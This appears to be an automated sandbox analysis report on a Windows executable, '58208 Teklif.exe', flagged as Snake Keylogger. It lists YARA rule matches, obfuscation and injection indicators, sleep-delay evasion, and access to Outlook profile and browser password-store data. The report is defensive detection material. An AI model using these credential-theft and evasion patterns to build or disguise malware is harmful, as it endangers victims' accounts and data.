            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR, Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 58208 Teklif.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, --.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, SfKvfedl6YqdMaJJcO.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.58208 Teklif.exe.32328f4.3.raw.unpack, ReactionVessel.cs, Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.31e6318.4.raw.unpack, ReactionVessel.cs, Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.5ad0000.10.raw.unpack, ReactionVessel.cs, Suspicious method names: .ReactionVessel.Inject
            Source: 0.2.58208 Teklif.exe.31ee330.0.raw.unpack, ReactionVessel.cs, Suspicious method names: .ReactionVessel.Inject
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
            Source: C:\Users\user\Desktop\58208 Teklif.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\58208 Teklif.exe.log
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Mutant created: NULL
            Source: 58208 Teklif.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 58208 Teklif.exe, 00000003.00000002.3769706051.000000000314C000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000315B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3771367022.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000313D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003182000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000318F000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 58208 Teklif.exe, ReversingLabs: Detection: 52%
            Source: 58208 Teklif.exe, Virustotal: Detection: 65%
            Source: unknown, Process created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Process created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\58208 Teklif.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\58208 Teklif.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: 58208 Teklif.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 58208 Teklif.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 58208 Teklif.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: uVJY.pdb source: 58208 Teklif.exe
            Source: Binary string: uVJY.pdbSHA256N source: 58208 Teklif.exe

            Data Obfuscation

            Source: 58208 Teklif.exe, Form1.cs.Net Code: InitializeComponent
            Source: 0.2.58208 Teklif.exe.5910000.9.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.58208 Teklif.exe.5910000.9.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.58208 Teklif.exe.31d4e7c.1.raw.unpack, nL.cs.Net Code: sf
            Source: 0.2.58208 Teklif.exe.31d4e7c.1.raw.unpack, nL.cs.Net Code: wb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.cs.Net Code: qlBVMDuy4O System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_0155F0E8 push esp; iretd 0_2_0155F0E9
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_01555DCA pushad ; iretd 0_2_01555DD9
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07792533 pushad ; retf 0_2_07792534
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_01419770 push esp; ret 3_2_01419771
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9CE01 push ds; retn 0006h3_2_05A9CE02
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD3675 push es; iretd 3_2_06BD367C
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDF759 push es; ret 3_2_06BDF888
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD2471 pushad ; retn 0006h3_2_06BD2472
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD9045 push es; ret 3_2_06BD904C
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD29AE push FFFFFF8Bh; ret 3_2_06BD29B0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFC561 pushad ; ret 3_2_06BFC562
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF62FB push ss; ret 3_2_06BF6302
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFACBB push ebp; ret 3_2_06BFAF12
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAAA9 push ecx; ret 3_2_06BFAAAA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAADB push ecx; ret 3_2_06BFAAE2
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAAD9 push ecx; ret 3_2_06BFAADA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFAB98 push ebx; ret 3_2_06BFAB9A
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFA918 push eax; ret 3_2_06BFA91A
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFA97F push ecx; ret 3_2_06BFA992
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF7081 push ds; ret 3_2_06BF7082
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF70C8 push ds; ret 3_2_06BF70CA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF7133 push ds; ret 3_2_06BF713A
            Source: 58208 Teklif.exeStatic PE information: section name: .text entropy: 7.939659429835133
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ov3UajLBVQs6ILc8yA.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'i0JnWyw5xe', 'MOxnJGogIN', 'xZFnz14FVB', 'oZQP4VsIre', 'SMaPbKk73w', 'bMlPnyjxBX', 'lxoPPcdbic', 'c6CLgUPAx8m36WCR7w8'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, YG1e6VBcKiUT8HVni8.csHigh entropy of concatenated method names: 'j6iMnrrXo', 'p8ds4yImq', 'md4Tavpur', 'G20iSVZgT', 'aahFPi9UW', 'CiECtA727', 'tUybNKNfTqdYoZ0tr2', 'MajRD6hbDtFIGdx9f0', 'nmkR6t3Zo', 'Vt3Ko8yQC'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, nYsJLGMJdGqdNxcgdO.csHigh entropy of concatenated method names: 'oZfPIEUDZm', 'AbEPpw7T7s', 'YquP6A5eoQ', 'FxdPdpMnpU', 'zR4Pw3nAjS', 'ly9PkUs6tT', 'fOUP1VFniU', 'IXdPgIxxc1', 'tLLPlLldYK', 'zESPQW0bKW'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, y8PW6obPExJQorPGBu.csHigh entropy of concatenated method names: 'PUv1peWQM3', 'ub41douQnv', 'Ida1kaGgVt', 'SIokJxddqo', 'TE8kzuUthS', 'LAV149d5sa', 'zVR1bWanxW', 'YAa1nQJA0V', 'sMJ1PSH4B3', 'pTe1V24RKv'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, FA8yIwaG2xHBjFO0PN.csHigh entropy of concatenated method names: 'Fc4RptwFhS', 'EVeR6UM9dl', 'lubRdrtiZe', 'wbCRwOgFgv', 'PRgRkHXP7O', 'L6hR1IQEB6', 'eB3Rgpd9P4', 'qhPRlHixdi', 'S4VRQK0INL', 'VgpRt0DtLp'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, SfKvfedl6YqdMaJJcO.csHigh entropy of concatenated method names: 'nnk6ogfMHI', 'WZI6SYuk2O', 'Aay6LotdmM', 'Lwo6qKRoVU', 'fRI6rQrFyJ', 'ASX6YJvp0C', 'GQa6NDXtmw', 'JqQ691veVc', 'AbF6WkBRpW', 'jr06JsKhRu'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, Mbac2TE9ygslISwFbl.csHigh entropy of concatenated method names: 'zTgRx5wWxo', 'xoiRuWHeOO', 'PC8Rm8EAhJ', 'B6DRabpI8L', 'niDRolSpvh', 'a35RAGoSbP', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, Nkn6l0K9M4ISy88b1R.csHigh entropy of concatenated method names: 're0dsqsuDH', 'XDIdTY5Jj5', 'hY8dekdd4V', 'QnBdFxerfv', 'agMd5cRdaU', 'nrxdhHsXBB', 'yI4dfZn2nB', 'JCDdRNs8mu', 'cvCdjBIYxS', 'pI0dKCocR3'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, mXyo9lc8mMDVspYqnf.csHigh entropy of concatenated method names: 'IGIf90u4nf', 'ExBfJeX3uM', 'DNyR4dJT2X', 'mgURbnNDK3', 'CCRfHahUry', 'jcjf7DgH0d', 'bHBfDsixjo', 'TDYfov7js9', 'LxMfSha9HS', 'YxIfL0IDco'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, B7MMIpTyXcBbeAMFnb.csHigh entropy of concatenated method names: 'Dispose', 'FQ4bWhVLQf', 'o8nnu9SeZV', 'RC388QtlOR', 'YPxbJoOXfX', 'WOmbzPxvcR', 'ProcessDialogKey', 'WSOn48lJPN', 'mNNnb0uFtA', 'YS2nnCABuy'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, oWVvW42EmpKy9BSgWw.csHigh entropy of concatenated method names: 'NdLce7BXFC', 'e0ccFG8oVR', 'gFicx0QBGB', 'a51cuM9OqG', 'MOCcajCCFG', 'ppscACJM34', 'JqIc26OlCA', 'K53cBAuR6K', 'wCVcO9SIUg', 'XLfcH1AifM'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, HvXS97UUa7qseCLu3gf.csHigh entropy of concatenated method names: 'ToString', 'EviKPn2vUo', 'NCmKVogdD4', 'aaOKIVTQ7p', 'yOsKpDSybS', 'aNsK6rbikR', 'SqqKdFojKR', 'ekOKwmwUGa', 'uXZ9jgAmpRMMPRXwgKT', 'DJtlJLAUmkqHGEHRhG7'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, f3RHjcWfG0nFOPiZ5P.csHigh entropy of concatenated method names: 'COKkIT7oB8', 'Somk6cWpNR', 'N97kwiIM3D', 'JmVk1JeW9a', 'WXdkg9ycc0', 'ge9wrGwvOM', 'aLSwYOuNWe', 'DEDwN7rkdg', 'Euww9vBYiR', 'JB8wWf9G31'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ymY9i55puh8sJQy4lC.csHigh entropy of concatenated method names: 'ugJfQ0bPMi', 'EUjftHC6ip', 'ToString', 'IHJfpr47EV', 'iuMf67hnUK', 'TjufdN0xe3', 'uF9fw4EONe', 'vwxfkdoTyn', 'vXuf152u6Q', 'ngMfg8J3RA'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, HKBtH9zLyWSY3PprRP.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bSdjcJXCiF', 'AO9j5EJ63N', 'IkojhWT6CJ', 'wq5jfnXkoA', 'Q8KjRe9Mdm', 'AQ7jjQhF9i', 'fDFjKN8UpI'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, ocgNYIURVbTtgbjxB1R.csHigh entropy of concatenated method names: 'IgOjUNYiVq', 'yiVjvWC42y', 'DNRjMwUZOR', 'srCjsyafAM', 'Ct8jZkArYX', 'rbHjTmPcUq', 'VgJjiPtaIT', 'XbBjePbQib', 'PahjFcdvR0', 'xdIjCOQ9pm'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, wVhD8CnnV4UcccbIW4.csHigh entropy of concatenated method names: 'aIg1USDgx9', 'jV91vi8o23', 'Qkm1MIg4hd', 'rXJ1sWCCTs', 'M8R1ZypAkO', 'DOC1TM8m8d', 'uZj1ihrlQY', 'Bk91elqMVa', 'AZG1FSQU8L', 'x2c1CC7Ogo'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, aKoppcmWP2f8yAjY4l.csHigh entropy of concatenated method names: 'fvfb1l7DpV', 'M8ibg0htUB', 'rVkbQxCgMi', 'MuybtMDkhM', 'ibbb5bMPHc', 'JrJbhVuZyN', 'WW1EHm7UrPxacBnLNj', 'u9OcAsoqmsDcU6Wgyu', 'TKAbbgfhvH', 'GupbPnXaUB'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, WXPo1s6SZUfJWf3Ztw.csHigh entropy of concatenated method names: 'fEswZqw6gn', 'KH4wi0cn65', 'fXJdmY30BN', 't3Bda0ERhb', 'RuodAb6oNk', 'deAd3Na0RH', 'iAed2Kwm3c', 'QRddBFGGbQ', 'qVcdE6IV2T', 'UTVdOCRbN1'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, MK85Z0STNaOnKwpaOT.csHigh entropy of concatenated method names: 'Enu5OCG8LK', 'GbQ57jpTW1', 'ujZ5oXg8dR', 'fer5S5WeBm', 'G5r5ua7vgk', 'UXZ5mplZnW', 'RXN5aOlFWK', 'OHt5AQFC9N', 'yjI53V0jKY', 'Oiu52CAMKh'
            Source: 0.2.58208 Teklif.exe.7d40000.11.raw.unpack, JgWfdKAVBhtTy2KMZT.csHigh entropy of concatenated method names: 'hN4jby8yLc', 'RhfjPQutD5', 'YgBjVCXnxK', 'I9Zjpvm4DR', 'lY5j6C4Jgp', 'ylMjwkVS9A', 'hNTjkaeNYd', 'zFvRNU0TDr', 'K6bR9CpeoW', 'wUmRW6x0ud'
            Source: C:\Users\user\Desktop\58208 Teklif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 9050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: A050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 1410000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598543Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598194Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597965Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597624Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597405Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596295Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595952Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeWindow / User API: threadDelayed 1541Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeWindow / User API: threadDelayed 8311Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7440Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7700Thread sleep count: 1541 > 30Jump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exe TID: 7696Thread sleep time: -599874s >= -30000sJump to behavior
            Source: 58208 Teklif.exe, 00000003.00000002.3765792530.000000000115F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllconf
